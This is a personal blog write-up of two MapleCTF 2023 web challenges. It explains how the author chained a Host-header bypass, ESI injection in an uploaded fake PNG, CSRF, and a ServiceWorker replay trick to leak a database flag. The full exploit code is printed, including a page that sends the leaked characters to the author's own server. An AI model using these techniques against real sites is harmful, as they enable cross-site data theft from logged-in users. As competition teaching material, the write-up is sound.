Monday, October 2, 2023

CTF Writeup: JUJUTSU KAISEN 1 & 2 @ MapleCTF-2023

This weekend I participated in MapleCTF, coming in 33rd overall. It was a great competition, with lots of interesting problems. I ended up spending most of my time on "JUJUTSU KAISEN 2". I didn't even have time to look at the two harder web problems. Overall I'm pretty proud of how I did in this competition, given that I was playing it solo and only 8 teams got the second Jujutsu problem.

I learned a lot solving this problem, especially about ServiceWorkers. Without further ado, here's how I solved this challenge:

The Challenge

  • Points: 223 and 476 (for 1 and 2 respectively)
  • Number of solves: 26 and 8.
  • Links: 1, 2

We are given a zip file containing a docker-compose setup with a number of services. They are:

  • An nginx load balancer that connects to the varnish cache and provides TLS termination.
  • Varnish caching layer that can connect to either the front-end app or the GraphQL backend.
  • A front-end node.js app (jjk_app).
  • A backend graphQL server (jjk_db) that powers the front-end app.
  • A report bot (You give it a url, it then launches google chrome, logs into the app and navigates to a website of your choosing).
  • A redis server backend for the report bot.

The front-end app is behind a login. You cannot register new accounts and you do not know the password (but the report bot does log in before visiting your site). The front-end app has two endpoints of interest, both behind auth: a character list powered by the GraphQL backend, including the flag, and a "/newchar" endpoint that allows you to upload an image that is saved to the server.

The flag is in the DB, so you either need to get it from the front-end endpoint that shows the query results, or you need to get it from the DB more directly.

The first challenge

There were two versions of this challenge. This usually means that there was some sort of unintended solution, which the second, harder version has patched.

Since we have the source code for both challenges, we can see how they differ, in case that gives us a hint.

$ diff -ur jjk1/ jjk2/

[omitting some inconsequential minor changes for space]

diff -ur jjk1/nginx/default.conf jjk2/nginx/default.conf
--- jjk1/nginx/default.conf    2023-09-29 16:23:05.000000000 -0700
+++ jjk2/nginx/default.conf    2023-09-30 01:30:28.000000000 -0700
@@ -1,7 +1,7 @@
 server {
         listen 443 ssl;
 
-        server_name localhost;
+        server_name jujutsu-kaisen-2.ctf.maplebacon.org;
         ssl_certificate /etc/nginx/ssl/nginx.crt;
         ssl_certificate_key /etc/nginx/ssl/nginx.key;
 
@@ -11,6 +11,6 @@
             proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
             proxy_set_header X-Forwarded-Proto https;
             proxy_set_header X-Forwarded-Port 443;
-            proxy_set_header Host $host;
+            proxy_set_header Host "jjk_app";
         }
-}
\ No newline at end of file
+}


This seems like a pretty clear hint that the solution to version 1 has something to do with the host header. It is the only thing of consequence that was modified.

There's pretty much only one thing you can do with a host header - change it. But what should we change it to?

Looking at the varnish config file, we see:

[..]

sub vcl_recv {
    if (req.http.host ~ "jjk_db" && std.ip(client.ip, "17.17.17.17") ~ internal) {
        set req.backend_hint = db_backend;
    } else {
        set req.backend_hint = app_backend;
    }
}

So basically, there are two backends varnish can connect to depending on the host header. The IP ACL check may look concerning at first. However, it checks the actual client IP rather than the X-Real-IP or X-Forwarded-For header, and the actual client IP is the nginx load balancer's IP, which is always internal. Hence this check is ineffective.

In any case, clearly the other possible value for the host header is "jjk_db". Given we have strong suspicions something is wrong with how host headers are handled, it seems natural to try this other value.

Sure enough, if we set the host header to "jjk_db", we end up being connected directly to the GraphQL backend, and can query the flag.

$ curl -g 'https://jujutsu-kaisen.ctf.maplebacon.org/?query={getCharacters{edges{node{notes}}}}' --header 'Host: jjk_db'

which gave us the flag.

The second challenge

Without the diff providing a hint as to where to look, we are going to have to go over the challenge in much more detail.

Usually when doing a CTF challenge, the first thing I do is look for the stuff that is out of place. Often challenges are written to use fairly standard tech choices for most of it, and then do something weird just for the vulnerable part. A good first step is to imagine you have been asked to do code review on the app. What parts would you flag as "needs improvement" or otherwise don't make sense? Those parts are usually key to solving the problem.

The first thing that stands out to me like a sore thumb is the varnish config.

Here is the full default.vcl

vcl 4.1;
import std;

backend app_backend {
    .host = "jjk_app";
    .port = "9080";   
}

backend db_backend {
    .host = "jjk_db";
    .port = "9090";   
}

acl internal {
    "localhost";
    "192.168.0.0/16";
    "172.0.0.0/8";
}

sub vcl_backend_response {
    set beresp.do_esi = true;
}

sub vcl_recv {
    if (req.http.host ~ "jjk_db" && std.ip(client.ip, "17.17.17.17") ~ internal) {
        set req.backend_hint = db_backend;
    } else {
        set req.backend_hint = app_backend;
    }
}

Additionally, if we look in docker-compose.yml, we see that varnish is started with an unusual command line argument: -p feature=+esi_disable_xml_check 

All this sticks out for a number of reasons:

  • It would be kind of unusual in general for a CTF challenge to have varnish caching if it wasn't part of the solution to the problem
    • Especially because load balancing is already being handled by nginx
    • Especially because it is mostly configured not to cache anything (Some static assets and 404 pages do get cached, but nothing that would be expensive to generate)
  • It is weird how jjk_db is configured as a backend, despite the fact that jjk_app does not route through varnish but instead contacts jjk_db directly
  • ESI while not totally unheard of, is somewhat of an obscure technology. Obscure technology choices should always raise eyebrows during CTFs.
    • More importantly, the challenge does not actually use ESI to render anything. So why is it explicitly enabled?
  • The custom command line argument is especially eyebrow raising. It is disabling a check for a technology that is not even used in the challenge. That sounds like it will be needed for the solution.

What is ESI?

It seems that there are a lot of hints here that ESI (Edge-side includes) is going to be important to this problem. So what is it?

ESI is a technology to allow CDN cache servers (e.g. varnish) to construct a page from multiple parts. You might want to use it if you want to cache different parts of your page for different times, or combine the results of different services into one page.

In essence, if you put <esi:include src="http://host/something.htm"/> in a page, the cdn server will substitute that url into the page at that point.

This should get our security spidey-senses going - it seems a bit like an SSRF. If we can sneak an ESI tag into the page, we can perhaps fetch the results of some page we are not normally allowed to access.

There is a big restriction though - in the varnish implementation you can only request urls that the varnish server is able to handle. You cannot request arbitrary urls from the internet.

What about the -p feature=+esi_disable_xml_check? I hadn't heard of this before, but a quick look at the official docs reveals that it makes varnish process ESI on all responses. By default, ESI (if enabled) would only process responses that look like HTML (start with a <). With this feature enabled, other responses, including images, get processed too. The importance of this will soon become apparent.

The rest of the App

The varnish config sticks out the most, but what else sticks out in this challenge? The most obvious thing is the existence of a report bot. This indicates that the challenge will have some sort of client-side component. But what type of client-side attack? Normally my go-to thought would be XSS, since that is the most common type of client-side vuln, but there is another big hint in jjk_app that indicates this is more likely a CSRF challenge:

From app/app.py

app.config.update(
    SESSION_COOKIE_SECURE=True,
    SESSION_COOKIE_HTTPONLY=True, # default flask behavior just does this
    SESSION_COOKIE_SAMESITE='None',
)

Setting SESSION_COOKIE_SAMESITE='None' clearly sticks out here. It should always stick out in a CTF challenge when a secure default is changed to something less secure.

Making cookies be SameSite="none" tells browsers to disable CSRF mitigations and to allow cookies to be sent on cross-site requests. This is a sure sign that CSRF is part of the problem. Additionally, the challenge does not have any CSRF tokens, the traditional way to prevent CSRF from before SameSite cookies were a thing.

Interaction points

Once I have identified the things that are weird, my next step is usually to try and identify the places in the app where interactions happen. Security vulns usually happen at the boundaries between systems, or between systems and users, so it is good to have a sense of where these are.

In this app we have (excluding entirely static endpoints):

  • A login page (but no credentials)
  • An api endpoint to view the list of characters as json, including the flag, but no way to access it as it is behind the login. Behind the scenes this makes a GraphQL query to jjk_db and displays the results. [This ends up being totally useless, but seems tantalizing at first glance]
  • A /newchar API endpoint (behind auth) that allows us to submit a new character to the DB. However, the part that actually modifies the DB is commented out, so the only thing we can do is upload a PNG file of the new character. Upon success, this endpoint redirects your POST request to the location of the newly uploaded file. This is the only write endpoint in the app.
    • File uploads are usually a security-sensitive spot, so I spent some time looking through the upload code, but it all looked very secure to me. It does not care if the PNG file is valid, but there is no way to upload something with the wrong extension/content-type.

The challenge also provides a report bot. The report bot logs into the app (thus getting cookies) and then goes to a URL provided by us. Given we already identified CSRF as the likely issue due to the disabled SameSite protection, and there is only one write endpoint, this suggests that the attack involves a CSRF attack against the image upload newchar api, as there are no other entry points to attack.

Putting together a plan of attack

Based on the things that stood out while reading through the code, the pieces start to come together and a rough plan of attack unfolds:

  • Use CSRF to upload a "PNG" file cross-domain
  • Put ESI directives in the PNG file to query the GraphQL endpoint to retrieve the flag and insert it into the PNG file
  • Somehow retrieve the PNG file to get the flag (???)
  • Profit!

The third step, extracting the PNG file, is the hard part of this challenge. Let's put that aside for the moment and talk about the first two steps. The easiest is making a PNG file with an ESI directive in it, so let's start there.

PNG file with ESI directives

This is pretty easy. The code does not care if the PNG file is valid, so we can just create a file containing:

<esi:include src="http://jjk_db/?query={getCharacters{edges{node{notes}}}}"/>

Name it something ending in .png, and we are good to go. To test this, I ran the app locally (docker-compose up). Since this is local, I know the username and password are "placeholder". To test, I simply navigated to https://localhost/newchar and filled out the form with the image (a GET to this endpoint shows a form, a POST does the upload).
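
For reference, the test "image" is nothing more than that ESI tag saved with a .png extension, e.g.:

# the fake PNG is just the ESI include; the file name is arbitrary
printf '<esi:include src="http://jjk_db/?query={getCharacters{edges{node{notes}}}}"/>' > evil.png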

When I first did this, it didn't work: I had forgotten the ending /. Varnish's ESI implementation requires the tag to be self-closing or it ignores it. To debug this, I ran docker-compose exec varnish varnishlog, which gives detailed debug logs of varnish's processing, including ESI error messages. The varnishlog and varnishncsa (basically the varnish access log) commands were quite helpful during debugging.

Once we hit submit on the form, we are redirected to the now-uploaded image. Since we didn't make a real image, Firefox shows it as broken, but if we download the image and open it in a text editor, we see the flag is present.

This feels like a promising step. We uploaded a file which, when retrieved, has the flag in it. However, we still have some ways to go. We were only able to upload because this is the local instance, where we know the password. In the real challenge we must upload by having the report bot navigate to our website, so we have to find a way to do this cross-domain. We also need some way to obtain the PNG afterwards, again cross-domain, despite the same origin policy.

Uploading cross domain with CSRF

In the real challenge we cannot upload directly to the site, because it is behind a password we do not know.

We do have the report bot. We can send urls for the report bot to visit, which it does after logging in. This is what the bot looks like:
 
        await loginPage.goto(`${CHALL_DOMAIN}/login`, {
            waitUntil: 'networkidle2',
            timeout: 2 * 1000,
        });
        await loginPage.type('#username', ADMIN_USERNAME);
        await loginPage.type('#password', ADMIN_PASSWORD);
        await loginPage.evaluate(() => {
            document.querySelector("#submit-login").click();
        });
        await loginPage.waitForNavigation({
            waitUntil: 'networkidle2',
            timeout: 2 * 1000,
        });

        const resp = await page.goto(url, {
            waitUntil: 'load',
            timeout: 3 * 1000,
        });

The "url" variable is the url we submit. Luckily for us, this challenge sets SameSite=None on all cookies as previously mentioned. Additionally the write endpoints are not protected with CSRF tokens. This means any requests to the challenge domain, including cross domain ones, will have the appropriate cookies and be logged in.

Many people assume that the web browser's same origin policy prevents all communication between separate domains on the web unless relaxed via CORS. This is not true. If the same origin policy were a file permission, it would be -WX (write & execute). You can write (POST) content to other domains, for example via form submission or AJAX; you just cannot read the results. Similarly, you can execute, i.e. load javascript or CSS from other domains. The only thing it prevents is javascript reading cross-domain content. You can even display cross-domain content, for example in <img> tags, as long as javascript does not have access to it (this is important later).

With that in mind, there are two ways we can upload cross-domain. We can simply make an html form and submit it via JS:
 
<form id="myform" action="https://jujutsu-kaisen-2.ctf.maplebacon.org/newchar" method="POST" enctype="multipart/form-data">
   <input type="file" id="file" name="file" value="Upload Image">
   <input type="submit">
</form>
<script>
  var b64 = "base64 encoded PNG file here";
  var bytes = Uint8Array.from(atob(b64), c => c.charCodeAt(0))
  var f = new File([bytes], "a.png", { type: 'image/png' });
  var dataTransfer = new DataTransfer();
  dataTransfer.items.add(f);
  document.getElementById( 'file' ).files = dataTransfer.files;
  document.getElementById( 'myform' ).submit();
</script>
 
Alternatively, you can use AJAX:
 
  /* Make sure we upload this as a "file" not normal POST parameter */
  var b64 = "base64 encoded PNG file here";
  var bytes = Uint8Array.from(atob(b64), c => c.charCodeAt(0))
  var f = new File([bytes], "a.png", { type: 'image/png' });
  var form = new FormData();
  form.append( 'file', f );
 
  fetch( "https://jujutsu-kaisen-2.ctf.maplebacon.org/", {
    mode: 'no-cors' /* Do not use CORS, since we are not authorized under cors. This causes the result to be opaque. */
    credentials: 'include', /* include the login cookies that the bot got when logging in so this request is logged in as Admin, despite not knowing the admin's password. */
    body: form, /* This automatically changes the Content-Type header */
    method: 'POST'
  } ).then( result => { /* result is opaque */ } );
 
 
In both cases, the result of the request is unusable. With the form, the page navigates to a new domain and we no longer have control over it or access to it. With AJAX, the result object returned is opaque, so we cannot read it. Nonetheless, that is one problem down; now we need to figure out how to read the PNG.

[Note: All this might change when chrome eventually implements storage partitioning. Firefox already does this if enhanced tracking protection is enabled]

Extracting the PNG

So this seems like a lot of progress. We can give the report bot our website, our website can upload a PNG file to the site, which when served has the flag in it.

But how do we get the flag? We cannot read the PNG file, as it is cross domain and the same origin policy prevents us.

Here's a couple of things I tried that didn't work:
  • XSSI - You can load javascript & CSS cross domain. You could make the png file be something like var data = "secret stuff";, include it in your page, and then read the variables in js. The problem is that modern browsers require correct mime types if your JS or CSS is cross domain, so this would have worked in older browsers but not recent ones.
  • Cache pollution - I played with the idea of using the varnish cache as a side channel to leak the data, e.g. forcing the answer to be cached a letter at a time and then trying to retrieve it later from a different host by looking at the Age header when retrieving specific urls. The problem is that varnish does not seem to be configured to cache the results of backend ESI fetches, so I wasn't able to alter the cache state from ESI as far as I could tell.
  • <img> tags - Image tags have onerror and onload event handlers that distinguish between valid and invalid image files, even cross domain. They also leak the width/height of the file (including 0x0 if invalid); see the small sketch after this list. This did not work because we do not know the url of the image, we only know we get redirected there after a POST. We can only set the img src to do a GET (however, this turns out to be not quite true, and is really important later).
  • Timing oracle - We basically have a blind DB injection. If this were SQL I would inject sleep(5) and check how long the request took to load. However, GraphQL doesn't support sleeps or other complex operations that one could easily construct a timing oracle out of. That said, after the competition I found out some teams did solve it this way, by forcing GraphQL to generate a really big multi-megabyte response, which was slow enough to be detected. I did not think of this.
  • <object> tags - An <object> tag is like a weird combination of <img> and <iframe>. Like <img>, you can distinguish between valid & invalid images using onload events. However you can also navigate them like an iframe. I spent a lot of time trying this, but it ultimately did not work. More on this below.
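
As an illustration of the <img> probe idea: if we did know the image's url, something like the following would leak its validity (and dimensions) cross-domain. This is only a sketch, and the url here is purely hypothetical:

<script>
// Sketch of a cross-domain image validity probe. The url is hypothetical;
// in this challenge we never actually learn the uploaded image's url this way.
var probe = new Image();
probe.onload = function () {
    console.log( 'valid image: ' + probe.naturalWidth + 'x' + probe.naturalHeight );
};
probe.onerror = function () {
    console.log( 'invalid image (or the request failed)' );
};
probe.src = 'https://jujutsu-kaisen-2.ctf.maplebacon.org/some-uploaded-image.png';
</script>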

So none of these seemed to work immediately. However, it did seem clear that, given a PNG file, it is possible to leak cross-domain whether or not it is a valid PNG file, and ESI gives us a way to make that validity depend on the flag. At this point I mistakenly thought I could use the <object> tag to leak this validity info cross-domain. I was on the right track, but <object> was the wrong approach. In any case, I decided to create a payload that would leak the flag based on whether or not the resulting PNG is valid.

Making a PNG validity oracle

This was actually fairly easy. The goal here would be to leak the flag a byte at a time.

The graphql endpoint supports LIKE queries, so if we want to test whether the flag starts with the letter A, we can do a query like:
{
    getCharacters( filters: {notesLike: "maple{A%"} )
    { edges {node {notes} } }
}

If one of the notes items contains the string "maple{A", the matching result is returned; otherwise an empty result is returned (i.e. {"data":{"getCharacters":{"edges":[]}}}). We try this for every letter until we get a match, then move on to the next letter, and so on (a rough sketch of this loop is below).
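
Here, checkGuess() is a hypothetical stand-in for the PNG validity oracle that the rest of this post builds:

// Conceptual sketch of the letter-by-letter search. checkGuess(prefix) is hypothetical:
// it should return true if notesLike: "maple{<prefix>%" matched something.
const alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789}';
async function findFlag() {
    let flag = '';
    while ( !flag.endsWith( '}' ) ) {
        for ( const letter of alphabet ) {
            if ( await checkGuess( flag + letter ) ) {
                flag += letter;
                break;
            }
        }
    }
    return 'maple{' + flag;
}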

To make this work, I first prepared a file that would contain the empty result inside it:

exiftool -Artist='{"data":{"getCharacters":{"edges":[]}}}' file.png

exiftool adds the empty result to the file's metadata.

I then opened the file in vim, found the inserted part, and replaced it with the text: <esi:include src='http://jjk_db:9090/?query={getCharacters(filters:{notesLike:"maple{XXX%25"}){edges{node{notes}}}}'/>
 
This of course makes the PNG file invalid, as the text chunk now spills into the next chunk, rendering the checksum incorrect, but that's ok. The idea is to post-process the file, replacing XXX with whatever letters we are currently checking.
 
After the file is uploaded, varnish replaces the ESI directive. If no match is found, GraphQL's empty response is inserted, which makes the PNG file valid once again. Otherwise, a longer response is inserted, which overflows the text metadata chunk, making the entire PNG file invalid. We now have our validity oracle.
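
The final exploit needs the bytes of this template split around the XXX placeholder (that is where the imgStart and imgEnd arrays further down come from). A quick Node.js sketch of one way to derive them, assuming the edited template is saved as file.png:

// Sketch (Node.js): split the template PNG around the "XXX" placeholder so the
// current guess can be spliced in between the two halves at exploit time.
const fs = require('fs');

const bytes = Array.from( fs.readFileSync( 'file.png' ) );
const marker = Array.from( 'XXX', c => c.charCodeAt( 0 ) );

let pos = -1;
for ( let i = 0; i <= bytes.length - marker.length; i++ ) {
    if ( marker.every( ( b, j ) => bytes[i + j] === b ) ) { pos = i; break; }
}

const imgStart = bytes.slice( 0, pos );
const imgEnd = bytes.slice( pos + marker.length );
console.log( JSON.stringify( imgStart ) );
console.log( JSON.stringify( imgEnd ) );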

<object> tag

Initially I thought the <object> tag would be my best bet. Originally meant for plugins, in the modern web it acts sort of like a mix between an <img> tag and an <iframe>. When given a (non-svg) image file it acts as an <img> tag; otherwise it acts like an <iframe>.

Like an <img> tag, it has onload & onerror event handlers (as well as leaking image dimensions). It can navigate like an iframe, but when loading an invalid image it won't trigger the onload handler (whereas an iframe will trigger onload even for invalid images). The important thing here is that onload triggers on every new valid navigation (in firefox anyways).

Thus a plan formed:
  • Create an HTML document with a <form> that uploads this png file and auto submits via javascript (See the snippet in the earlier "Uploading cross domain with CSRF" section)
  • Load this form in an <object> tag with an onload handler
  • If the onload handler triggers once, then we know we have an invalid file (and hence guessed the flag prefix correctly). If it triggers twice, then we have a valid png and our guess is wrong. (A rough sketch of this is below.)
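
A minimal sketch of that idea (upload-form.html is a hypothetical name for the auto-submitting form page; as it turns out below, this only behaves this way in firefox):

<!-- Sketch: count onload events on an <object> hosting the auto-submitting upload form.
     1 load  = the navigation to the uploaded image never fired onload (invalid PNG, guess correct).
     2 loads = the uploaded image was a valid PNG (guess wrong). -->
<script>
var loads = 0;
function objLoaded() {
    loads++;
    console.log( 'onload count: ' + loads );
}
</script>
<object data="upload-form.html" onload="objLoaded()" width="400" height="400"></object>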

This seems great. I implemented it and tested it out locally in firefox. It worked (assuming enhanced tracking protection is off)!

Problem solved, right? Not so fast.

I tried submitting my script to the report bot, and it did not work. As I debugged further, I realized that the report bot uses headless chrome, whereas I was testing in firefox. Apparently <object> is implemented quite differently between firefox and chrome.

In chrome we only get the onload event once, not on every navigation. Additionally, the object tag seems to choose whether it is an <img> or an <iframe> at initialization time. In <img> mode we get different events for valid vs invalid images, it adjusts its size based on the image, and svgs are rendered without scripts. On the other hand, in <iframe> mode we do not get a distinction between valid & invalid images (both trigger onload events), the size of the element does not adjust for different-size raster images (oddly enough it does adjust for SVGs), and SVGs are run with scripts enabled.

It seems to decide what mode to be in first by looking at the type attribute. If that's missing, it looks at the extension in the url of the data attribute. If it ends up guessing wrong and is in <img> mode for something whose Content-Type is not an image, it appears to change into iframe mode and restart the load (i.e. you see two loads of the resource in the network tab). All of this seems to happen only when first initializing; once it is initialized, it does not appear to change mode on future navigations.

All that's to say, my plan won't work. To get the events I want, I need it to be in <img> mode, but I need it to first be in <iframe> mode to do the form submission. You can potentially target a form submission into an <object> from the outside, but that only works in <iframe> mode. So this seems a bit like a dead end: I can have one behaviour or the other, but I actually need a mix of both.

I tried a lot of things here for a long time, and nothing was working. At some point I had the bright idea to use ServiceWorkers.

Enter service workers

ServiceWorkers are a web browser feature where the javascript on your page can essentially act as a MITM proxy, manipulating network requests for your page. Once you install the ServiceWorker javascript, it stays resident in the background, intercepts all requests to your site, and then can either let them through, cache them, or give a custom response. The idea is to allow web authors to implement custom caching schemes or offline access to their websites.

This seemed perfect for my needs. I could preload the POST form submission and cache it. Then, when I load the object tag, I could make it load the cached POST submission instead of the normal behaviour of issuing a brand new GET request. Hopefully that would let me view the /newchar endpoint with <object> in img mode, and have the onload handler indicate whether the image is a valid PNG.

At first I wasn't sure if you can cache a POST request in ServiceWorkers, POST being non-idempotent and all. It turns out it doesn't really matter: you can substitute pretty much any response for any other with ServiceWorkers. It even works for cross-domain requests (you cannot read them and there are some restrictions related to that, but you can substitute them for each other as long as it is the same type of request).

However there was a problem: <object> tags in chrome do not seem to use service workers at all. Kind of weird. Generally <iframe>s do not if they are cross-domain, since that is considered a separate browsing context for a separate website and not part of your site anymore. However, object tags do not seem to use ServiceWorkers at all, even when same-domain, and even when in image mode.

When playing with this, I did notice that if there was already an <img> tag on the page for some resource, then the <object> tag would use it as a cache when in img mode, even if that <img> tag was fed by a ServiceWorker. So this presented a plan:
  • Do a POST submission of the form using ajax. Make ServiceWorker cache it.
  • Load the url in an <img> tag, ensuring the ServiceWorker uses the cached response
  • Load the <object> tag, which would use the <img> tag as a source, allowing us to look at onload events.

I started implementing this, but then realized it was pretty silly. <img> tags also have onload/onerror events. There is no need to bother with the <object> tag if I can load the result of the form submission into an <img>. With that in mind, I ditched the last step and just used the <img> tag.

Finally putting it all together

So to summarize, here is where we are at:
  • Create a PNG file with an <esi:include> tag in it
  • The esi:include tag does a GraphQL query allowing us to guess one letter of the flag. If the guess is incorrect the PNG file stays valid, otherwise it becomes invalid.
  • Make a CSRF request to the jjk_app uploading the png file. Have the service worker cache the response
  • Load an <img> of the same url, ensuring the ServiceWorker uses the cached POST result
  • Install onload and onerror handlers to the <img> tag
  • If the onload handler is triggered the guess is incorrect and we try the next letter in the alphabet. If the onerror handler is triggered, the guess is correct. Save the letter and start guessing the next letter in the flag.
  • Once we have the flag, make an ajax request back to our server to tell us what it is.
 
The ServiceWorker code is pretty simple: if the requested url does not contain /newchar, ignore it and let the browser handle it. Otherwise, check the cache; if we have a cached entry for that url (including from POST requests), use that. Otherwise, request the url from the internet and store the result in the cache. When storing it, we key it by the url alone rather than the original Request object, so that later GET requests for the same URL will match the cached POST response.
 
The end result is that if we first make an AJAX POST request to the /newchar API endpoint, that response will be fetched and cached. The subsequent GET request to the same endpoint will then be served from cache, using the result of the POST request instead of making a new GET request. This is despite the fact that the method is different, the requests have different cookies, and one of them includes a file upload.
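
In other words, once the worker is registered, the sequence the exploit page performs looks roughly like this (a sketch only; craftedPngBytes stands in for the PNG template with the current guess spliced in):

// Sketch of the POST-then-GET sequence the worker makes possible.
const url = 'https://jujutsu-kaisen-2.ctf.maplebacon.org/newchar?guess=a';
const craftedPngBytes = new Uint8Array( [ /* imgStart + guess + imgEnd, as built above */ ] );

const form = new FormData();
form.append( 'file', new File( [craftedPngBytes], 'a.png', { type: 'image/png' } ) );

fetch( url, { method: 'POST', body: form, mode: 'no-cors', credentials: 'include' } ).then( () => {
    // The worker has now cached the (opaque) POST response under `url`. Loading the same
    // url as an image replays that response, so onload/onerror reveal PNG validity.
    var img = new Image();
    img.onload = () => console.log( 'valid PNG -> guess was wrong' );
    img.onerror = () => console.log( 'invalid PNG -> guess was correct' );
    img.src = url;
} );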
 
 
Here's the code for my service worker (service-maple.js):
 
function log(a) {
    console.log(a);
    //fetch( 'https://bawolff.net/map?log=' + encodeURIComponent(a), { "mode": "no-cors" } );
}

self.addEventListener('install', event => {
    log( "Service worker installed" );
});

self.addEventListener('activate', event => {
    log( "activating service worker" );
    // Take over tabs immediately instead of waiting for next page load
    self.clients.claim();
});

// This intercepts all network loads.
self.addEventListener('fetch', event => {
    log( "ASKING for " + event.request.method + ' ' + event.request.url + ' in ' + event.request.mode + ' ' + event.request.destination );
    if ( event.request.url.indexOf( '/newchar' )  === -1 ) {
        log( "skipping " + event.request.url );
        return;
    }
    event.respondWith(
        // ignoreMethod probably not strictly needed here, since we don't save the original Request object in cache.
        caches.match(event.request, { ignoreMethod: true, ignoreVary: true }).then(cachedResponse => {
            if (cachedResponse) {
                log( "SERVING " + event.request.method + ' ' + event.request.url + " from cache" );
                // The docker image has a small storage quota, so delete the cached entry when done.
                caches.delete( event.request.url );
                return cachedResponse;
            }

            return caches.open("mycache").then(cache => {
                // We don't have the response, so fetch it from internet.
                return fetch(event.request).then(response => {
                    // Put a copy of the response in cache. Note we save it under event.request.url
                    // instead of event.request, to ensure the fact it is a POST request was not saved.
                    return cache.put(event.request.url, response.clone()).then(() => {
                        log( "STORE_IN_CACHE " + event.request.url );
                        return response;
                    });
                }).catch( function (err) {
                    log( err );
                    // Don't want an error to take down the whole service worker, so return a dummy response.
                    return new Response(new Blob(), {status:500} );
                } );
            });
        })
    );
});
 
 
All that is left is the code that makes use of the service worker. We convert the PNG file into an array of 8-bit integers, split across two variables, and splice our guess in the middle. We then make the POST request, followed by loading the same url as an image. If the image's onload event handler is triggered, we know we have a valid PNG, so our guess at the flag is wrong and we try the next letter in the alphabet. If the onerror handler triggers, we know the PNG file is invalid (or a network error happened, the session cookie wasn't present, or something else went wrong; this can be a bit flaky). That means our guess was correct, so we save the letter and move on to guessing the next one.
 
The resulting exploit code (maple-jjk-explot.htm) looks like this:
 
<html>
<head>
<script>

// Load the service worker.
navigator.serviceWorker.register('service3.js');

function start() {
    // Put a little delay to make sure ServiceWorker is activated
    // More proper solution would be to postMessage after activation.
    window.setTimeout( tryNext, 600 );
}

const imgStart =  [137, 80, 78, 71, 13, 10, 26, 10, 0, 0, 0, 13, 73, 72, 68, 82, 0, 0, 0, 1, 0, 0, 0, 1, 1, 3, 0, 0, 0, 37, 219, 86, 202, 0, 0, 0, 6, 80, 76, 84, 69, 0, 128, 0, 255, 255, 255, 20, 63, 47, 79, 0, 0, 0, 46, 116, 69, 88, 116, 65, 114, 116, 105, 115, 116, 0, 60, 101, 115, 105, 58, 105, 110, 99, 108, 117, 100, 101, 32, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 106, 106, 107, 95, 100, 98, 58, 57, 48, 57, 48, 47, 63, 113, 117, 101, 114, 121, 61, 123, 103, 101, 116, 67, 104, 97, 114, 97, 99, 116, 101, 114, 115, 40, 102, 105, 108, 116, 101, 114, 115, 58, 123, 110, 111, 116, 101, 115, 76, 105, 107, 101, 58, 34, 109, 97, 112, 108, 101, 123 ];

const imgEnd = [37, 50, 53, 34, 125, 41, 123, 101, 100, 103, 101, 115, 123, 110, 111, 100, 101, 123, 110, 111, 116, 101, 115, 125, 125, 125, 125, 39, 47, 62, 30, 68, 92, 77, 0, 0, 0, 10, 73, 68, 65, 84, 8, 91, 99, 96, 0, 0, 0, 2, 0, 1, 98, 64, 79, 104, 0, 0, 0, 0, 73, 69, 78, 68, 174, 66, 96, 130, 10 ];

// Cache busting for ease of testing.
const rand = Math.random();

const urlParams = new URLSearchParams(window.location.search);
var flagGuess = urlParams.get('prefix') || '';

const urlPrefix = urlParams.get( 'url' )
// During testing use: 'https://nginx/newchar?guess='
// for the real deal use: 'https://jujutsu-kaisen-2.ctf.maplebacon.org/newchar?guess=';

var a = [ "---", "---","a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", '}' ];

var i = 0;

// Generate our image to upload.
function getFormData(url) {
    var guess = url.substring(urlPrefix.length);
    var imgMid = [];
    for (var i = 0; i < guess.length; i++ ) {
        imgMid[imgMid.length] = guess.charCodeAt(i);
    }

    var form = new FormData();
    var blob = Uint8Array.from(imgStart.concat( imgMid, imgEnd) );
    var f = new File([blob], "a.png", { type: 'image/png' });

    form.append( 'file', f );
    return form;
}

// Invalid PNG file means guess was successful. Save and move to next letter in flag.
function onerr(e) {
    console.log("SUCCESS " + e.target.title);
    // Report back on success.
    fetch( "https://bawolff.net/map/YES/" + e.target.title + '?' + rand, { "mode": "no-cors" } );
    if ( e.target.title === '---' ) {
        // Hack, sometimes the first attempt wasn't working.
        tryNext();
        return;
    }
    flagGuess = e.target.title;
    if ( flagGuess.length < 40 ) {
        i = 0;
        tryNext();
    }
};

// PNG was invalid or first time. Try next letter in alphabet.
function tryNext(e) {
    if ( e ) {
        console.log( "failed: " +  e.target.title );
        fetch( "https://bawolff.net/map/fail/" + e.target.title, { "mode": "no-cors" } );
    }
    if ( i >= a.length ) {
        fetch( "https://bawolff.net/map/TriedAll/" + flagGuess  + '?' + rand, { "mode": "no-cors" } );
        console.log( "tried all" );
        return;
    }
    console.log( "Setting: " + flagGuess + a[i] );
    fetch( urlPrefix + flagGuess + a[i] + '&bust=' + rand, {
        mode: 'no-cors',
        credentials: 'include', /* include login cookies */
        body: getFormData( urlPrefix + flagGuess + a[i] ),
        method: 'POST'
    } ).then( result => {
        window.setTimeout( function () {

            var elm = new Image();
            elm.title = flagGuess + a[i];
            elm.onerror = onerr
            elm.onload = tryNext;
            elm.src = urlPrefix + flagGuess + a[i] + '&bust=' + rand;
            i++;

        }, 100 );
    } )
}
</script>
</head>
<body onload="start()">jjk script.
</body>
</html>
 

 
For ease of testing, the code looks at its own url to decide what the challenge url is. Because the bot may time out before completely extracting the flag, there is also a 'prefix' parameter for the part of the flag we have already figured out, so we can restart from the middle of the flag.

If testing locally in a browser (pro-tip: start chromium with --ignore-certificate-errors; I wasted a lot of time on cert errors), we would log into the app first and use a url like https://bawolff.net/maple-jjk-explot.htm?url=https://localhost%2Fnewchar%3Fguess%3D&prefix=

When testing with the actual challenge but locally, we use a url like:
https://bawolff.net/maple-jjk-explot.htm?url=https://nginx%2Fnewchar%3Fguess%3D&prefix=

Finally, when doing the real thing, we use a url like:

https://bawolff.net/maple3.htm?url=https%3A%2F%2Fjujutsu-kaisen-2.ctf.maplebacon.org%2Fnewchar%3Fguess%3D&prefix=

To see the answer we tail -f /var/log/apache2/access.log:

